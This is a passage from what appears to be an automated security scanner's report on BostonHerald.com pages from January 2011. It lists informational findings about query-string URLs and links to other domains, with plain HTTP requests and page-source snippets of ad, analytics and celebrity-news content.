<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.306. http://www.bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/track/inside_track/view.bg?articleid=1312537&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110128hernia_sends_hearty_partier_sheen_to_the_hospital%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/inside_track/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110124/stp/3affe6_matt_01242011.JPG
http://multimedia.heraldinteractive.com/images/20110127/a37654_sheen_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/2862.htm
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/inside_track/view.bg?articleid=1312537&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:36:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110128hernia_sends_hearty_partier_sheen_to_the_hospital%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Hernia sends hearty partier Charlie Sheen to the hospital');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312537&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(32) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/a37654_sheen_01282011.jpg" alt="Charlie Sheen." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widget.newsinc.com/2862.htm' frameborder='0' scrolling='no' height='350px' width='300px' style='border:solid 1px #bcbcbc'></iframe><p><iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg" alt="Actor Charlie Sheen hospitalized, publicist says" /></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110124matt_damon_likes_martin_sheens_psychic/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/3affe6_matt_01242011.JPG" alt="Matt Damon likes Martin Sheen’s psychic" /></a>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.307. http://www.bostonherald.com/track/star_tracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/track/star_tracks/?srvc=track&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2F%3Forder%3DlastUpdate.desc&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/star_tracks/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110125/stp/7015f7_gaga_12242010.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/a146ce_keith_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/abc7a8_brett_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/217acb_Prince_01192011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/533087_Neil_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/55954d_Burke_11052009.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/ceceaa_Bristol_02242010.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/d0a387_Padma_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/d842d2_Cruz_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/67bc6f_beebs_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/98db3d_stew_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/a2c141_kate_01282011.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/star_tracks/?srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Star Tracks - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2F%3Forder%3DlastUpdate.desc&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/star_tracks/view/20110128startracks/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/67bc6f_beebs_01282011.jpg" alt="Justin Bieber."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a2c141_kate_01282011.jpg" alt="Kate Hudson."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/98db3d_stew_01282011.jpg" alt="Kristen Stewart"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127star_tracks/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/d842d2_Cruz_01272011.jpg" alt="Javier Bardem and Penelope Cruz"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/ceceaa_Bristol_02242010.jpg" alt="Bristol Palin"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127vince_neil_gets_15_days_for_dui/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/533087_Neil_01272011.jpg" alt="Motley Crue singer Vince Neil"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127kate_middleton_and_prince_william_break_out_fax_machine/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/217acb_Prince_01192011.jpg" alt="Kate Middleton and Prince William"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127complicated_custody_battle_for_padma_lakshmi/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/d0a387_Padma_01272011.jpg" alt="Padma Lakshmi "></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127cheryl_burke_reveals_childhood_abuse/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/55954d_Burke_11052009.jpg" alt="Cheryl Burke"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125lady_gaga_is_the_queen_of_social_networks/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/7015f7_gaga_12242010.jpg" alt="Lady GaGa"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125keith_olbermann_may_write_for_cable_news_show/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/a146ce_keith_01252011.jpg" alt="Keith Olbermann."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125bret_michaels_to_have_surgery_again/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/abc7a8_brett_01252011.jpg" alt="Bret Michaels."></a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.308. http://www.bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/track/star_tracks/view.bg?articleid=1312558

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128kate_hudson_on_baby_bump_it_feels_like_a_girl%2Fsrvc%3Dtrack%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/star_tracks/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/a2c141_kate_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/star_tracks/view.bg?articleid=1312558 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
